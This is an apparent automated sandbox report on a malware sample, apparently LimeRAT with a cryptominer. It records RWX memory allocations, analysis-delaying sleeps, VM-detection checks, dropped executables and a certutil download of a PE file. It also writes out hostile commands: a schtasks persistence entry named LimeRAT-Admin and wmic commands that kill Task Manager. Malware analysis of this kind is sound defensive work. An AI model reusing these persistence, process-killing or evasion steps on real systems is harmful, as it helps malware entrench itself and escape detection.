NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00577000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00af1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00af2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00af3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00af4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000708e3000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2256 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a12000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2256 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00590000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00415000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (2 events)

description	wscript.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
description	winlogins.exe tried to sleep 219 seconds, actually delayed analysis time by 219 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (50 out of 68 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3348101 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3347586 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3347586 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3347586 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3347578 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3347578 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 1246528 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3343470 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3347837 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3347586 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3347586 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3343574 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3343472 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:57 a.m.	number_of_free_clusters: 3343470 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343470 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 2, 2022, 8:58 a.m.	number_of_free_clusters: 3343436 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1

Creates executable files on the filesystem (50 out of 285 events)

file	C:\Windows (x86)\KBDMLT48.DLL
file	C:\Windows (x86)\KBDBE.DLL
file	C:\Windows (x86)\KBDCZ1.DLL
file	C:\Windows (x86)\TRACERT.EXE
file	C:\Windows (x86)\KBDLT.DLL
file	C:\Users\test22\AppData\Local\Temp\versioncd.bat
file	C:\Windows (x86)\KBDMYAN.DLL
file	C:\Windows (x86)\KBDAZST.DLL
file	C:\Windows (x86)\KBDNTL.DLL
file	C:\Windows (x86)\KBDA2.DLL
file	C:\Windows (x86)\KBDBENE.DLL
file	C:\Windows (x86)\icmp.dll
file	C:\Windows (x86)\KBDINDEV.DLL
file	C:\Windows (x86)\asferror.dll
file	C:\Windows (x86)\kbdgeoer.dll
file	C:\Windows (x86)\KBDPASH.DLL
file	C:\Windows (x86)\KBDBR.DLL
file	C:\Windows (x86)\tier2punctuations.dll
file	C:\Windows (x86)\KBDINTAM.DLL
file	C:\Windows (x86)\KBDMONST.DLL
file	C:\Users\test22\AppData\Local\Temp\hosting.bat
file	C:\Windows (x86)\KBDHU.DLL
file	C:\Windows (x86)\KBDSMSFI.DLL
file	C:\Windows (x86)\KBDUKX.DLL
file	C:\Windows (x86)\kbdax2.dll
file	C:\Windows (x86)\KBDFR.DLL
file	C:\Windows (x86)\KBDYCC.DLL
file	C:\Windows (x86)\KBDINBE1.DLL
file	C:\Windows (x86)\kbd101a.dll
file	C:\Windows (x86)\KBDTUF.DLL
file	C:\Windows (x86)\KBDBLR.DLL
file	C:\Windows (x86)\KBDTUQ.DLL
file	C:\Windows (x86)\KBDFTHRK.DLL
file	C:\Windows (x86)\KBDIBO.DLL
file	C:\Windows (x86)\kbd106.dll
file	C:\Windows (x86)\KBDLT2.DLL
file	C:\Users\test22\AppData\Local\Temp\version.bat
file	C:\Windows (x86)\KBDTH3.DLL
file	C:\Windows (x86)\KBDIT142.DLL
file	C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe
file	C:\Windows (x86)\KBDSL1.DLL
file	C:\Windows (x86)\KBDRU.DLL
file	C:\Windows (x86)\KBDUSL.DLL
file	C:\Windows (x86)\KBDJAV.DLL
file	C:\Windows (x86)\KBDMACST.DLL
file	C:\Windows (x86)\KBDINASA.DLL
file	C:\Windows (x86)\KBDDV.DLL
file	C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat
file	C:\Windows (x86)\kbdgeoqw.dll
file	C:\Windows (x86)\KBDMAORI.DLL

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk

Creates a suspicious process (13 events)

cmdline	wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
cmdline	wmic process where name='windowsapp.exe' delete
cmdline	schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe'"
cmdline	wmic csproduct get UUID /format:list
cmdline	wmic process where name='taskmgr.exe' delete
cmdline	wmic process where name='xmrig.exe' delete
cmdline	wmic process where name='Taskmgr.exe' delete
cmdline	C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list \|find "="
cmdline	wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
cmdline	wmic process where name='xagal.exe' delete
cmdline	C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list

Drops a binary and executes it (10 events)

file	C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe
file	C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe
file	C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
file	C:\Users\test22\AppData\Local\Temp\updateW\win.com
file	C:\Users\test22\AppData\Local\Temp\updateW\runx.vbs
file	C:\Windows (x86)\xagal.exe
file	C:\Windows (x86)\run.vbs
file	C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat
file	C:\Windows (x86)\xcls.bat
file	C:\Windows (x86)\explorer.exe

Drops an executable to the user AppData folder (6 events)

file	C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
file	C:\Users\test22\AppData\Local\Temp\updateW\csrss.exe
file	C:\Users\test22\AppData\Local\Temp\updateW\win.com
file	C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe
file	C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe
file	C:\Users\test22\AppData\Local\Temp\IE.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 2, 2022, 8:56 a.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe" filepath: C:\Windows\sysnative\cmd	1	1
ShellExecuteExW May 2, 2022, 8:57 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe"" filepath: C:\Windows\System32\cmd	1	1
ShellExecuteExW May 2, 2022, 8:57 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat	1	1
ShellExecuteExW May 2, 2022, 8:57 a.m.	show_type: 0 filepath_r: C:\Windows (x86)\xcls.bat parameters: filepath: C:\Windows (x86)\xcls.bat	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (9 events)

Time & API	Arguments	Status	Return
Process32NextW May 2, 2022, 8:57 a.m.	snapshot_handle: 0x0000000000000240 process_name: pw.exe process_identifier: 2516	1	1
Process32NextW May 2, 2022, 8:57 a.m.	snapshot_handle: 0x0000000000000240 process_name: svchost.exe process_identifier: 2076	1	1
Process32NextW May 2, 2022, 8:57 a.m.	snapshot_handle: 0x0000000000000240 process_name: WmiPrvSE.exe process_identifier: 2196	1	1
Process32NextW May 2, 2022, 8:57 a.m.	snapshot_handle: 0x0000000000000240 process_name: wscript.exe process_identifier: 192	1	1
Process32NextW May 2, 2022, 8:57 a.m.	snapshot_handle: 0x0000000000000240 process_name: wscript.exe process_identifier: 2840	1	1
Process32NextW May 2, 2022, 8:57 a.m.	snapshot_handle: 0x0000000000000240 process_name: winlogins.exe process_identifier: 2256	1	1
Process32NextW May 2, 2022, 8:57 a.m.	snapshot_handle: 0x0000000000000240 process_name: taskhost.exe process_identifier: 3424	1	1
Process32NextW May 2, 2022, 8:57 a.m.	snapshot_handle: 0x0000000000000240 process_name: explorer.exe process_identifier: 3836	1	1
Process32NextW May 2, 2022, 8:57 a.m.	snapshot_handle: 0x0000000000000240 process_name: conhost.exe process_identifier: 2576	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 2, 2022, 8:56 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process certutil.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile May 2, 2022, 8:57 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $þ1 º`_Zº`_Zº`_Zü®Z·`_Zü¬Z1`_ZüZ¢`_Z>\[¬`_Z>[[©`_Z>Z[`_Z³ÜZ°`_Z³ÌZ¹`_Zº`^Z@`_Z->Z[`_Z->_[»`_Z(> Z»`_Z->][»`_ZRichº`_ZPELþ¶YàâøÉÎ@ @@4t(°FXPnT@Ä .textËáâ `.rdata æ@@.dataò @À.gfidsè @@.rsrcF°H@@.relocX Ö@B¹ËCéáK¹ØËCéZ¹ÄËCèª´hñBè+ºYÃhñBèºYÃè Þ£XDÃhdDÿÄCh¡ñBèý¹YÃ¹Dé\|ò¹àFEèÉhñBèÝ¹YÃ¹±DèÉh·ñBèÇ¹YÃ¹ ²DèHhÁñBè±¹YÃÌÌÌÌÌÌÌÌÌÌÌÌìXUVW¼$tt$dÿt.ÆWPèRÆPèlt$rW4FVè<VèXÄ4FÆh¢è¼PVèVè8hC4FÆVèVè!3ÉjXfLFD$(^VQPè¦Ä$Ä$¼$x¬$p=ªCD$¡ËCD$D$dD$$lD$<D$t$l$(ÇD$,ÇD$@PtÿªCëÿ×ðöu/ÿªC=0u 3À8$xfED$PtÿªCëÿ×ðö_^À]ÄXÂUìì,EüPÿXªCÀt2Àë\E3ÉEÜÔýÿÿEäEEèEÜWPMàÇEìAMðMôÿ\ªCøÿu2ÀëVÿuWÿ`ªCMüðWQÿR3Àö^À_å]Â¶D$Pÿt$ÿt$ÿ4«CPÿ0«CÂ¶D$÷ØÀà Pÿt$ÿt$ÿ4«CPÿ<«CÂUì}0tY}u]E ¹ÄËC$¶ÀPÿuÿuèD¸öE t>ÿuÿ(«CÀt1h!0Pÿ4«CÀt!öE thCPÿ,«Cë ÿu¹ÄËCèÙ·2À]ÂUììLEM´eøEüEE´ÇEôèÂêå]Â¸GíBè²QSVñuðèª}3ÛÇC$]üèáIè ÆEüèý¬"Ð!Ô!èKÈEè@9]ÆEüÀ¼!¸!Àt#h°rèW±YEÆEüÀt ÈèëÃëE¼!QÀ!ÿÄ!ÿÈ!ÿj@F"SPÇølülmmÐ!Ô!mfmØ!èlìlðlôlèvÁj4H"SPègÁj ESPèXÁMôÄ$ m3À(m,m0m4m8m<mfBmÆm@mà!^[d å]ÂQ3À$ $(,08<@DHLÁYÃUìd¡jÿh¡ðBPd%Vñ>t~t ÿvÿ6èÇÿ6èùYMôd ^å]ÃUìd¡jÿh¡ðBPd%Vñ>t~t FÀPÿ6èÅÆÿ6è¯YMôd ^å]ÃVñ¾¸!ÇCt W¾¼!ÿtÏèGh°rWèb¯YY_èUè2ÿÿÿ 2è'ÿÿÿè è«$èôGÎ^é{Á éþþÿÿUìd¡Ñjÿh¡ðBPd% jÿrÿrÿPMôd å]ÃVñèPÿÿÿöD$t hH}VèÏ®YYÆ^ÂD$VñFN;NFSU½ØËCWÀt;ÈvPh°CUèlTÄÍèTF^ÁèÀ F;ØwØ~St:èzøYÿuÍèkT>t8ÿvÿ6Wè7ÀÄÿvÿ6èYÅÿ6èCYëÿ6èIøYYÿuÍè.T>_]^[^ÂD$VñFN;N¦FSU½ØËCWÀt;ÈvPh°CUèµSÄÍèãSF^ÁèÀ F;ØwØ~Pt@èÀøYÿuÍè±S>t>FÀPÿ6Wèz¿FÄÀPÿ6èÄÿ6èYëÿ6èøYYÿuÍènS>_]^[^ÂD$;Av+APè.ÿÿÿëAÂVÿt$ñèÿÀu8 muFPj7èÜúÿÿj¹ØËCèÜR^Â¹mT$tÂ÷Ð@àÐ¹øluÂëÂÂÂ¸YíBèÚ¬ìWù¿þlu2Àë}S}äÿPEìUð3ÛÏ]ü8$"t#mÀSSPÿRÏèE9XÃë1V7SèRPÏÿVhCÏèË"^ÀtÿuÏè»Àt³MäèýÿÿÃ[Mô_d å]Â¸síBè/¬ì SVWù3Ûj·ø!VmmÿPøt2ÀéöjVmèûÀt(øløÿ7ÏSÿVèÏÓRPÿVéæh MÔèASÏ]üÿPMØÁðQÿuÔÏEìÿRÈóMðÉMÔÎ9RuJ+ÆPQèÀt:Mìøløu6ö~2ù}-}ð~'EÔ+ÁxRuxSuxFuxXt EðF;ð\|§ë3SSPÏmÿRøløtøuø!jQÏÿPMÔ9mu è½úÿÿéâþÿÿMüÿè¯úÿÿøløuGPj:èøÿÿé¾þÿÿøu%·ÿ!jVÏÿP> þÿÿÇ"ë,Ç"ë Ü!øt ¿à!tøtÏè§ÏèóÀuÕ¿ mt }JþÿÿÏè¿mtGPjèð÷ÿÿ}%þÿÿ¿à!$"þlt ¿mÚÏ}ØÿPEàUäìl·èlEðlEìôlEðÜ!ÇEüEèë=Ü!øu!¿ýlt¿XVu3À@ëÃmë øtøt/ÏèÂÏèÀu¸ë¿ýlt¿3u3ÛCm request_handle: 0x0000000000cc000c	1	1	0
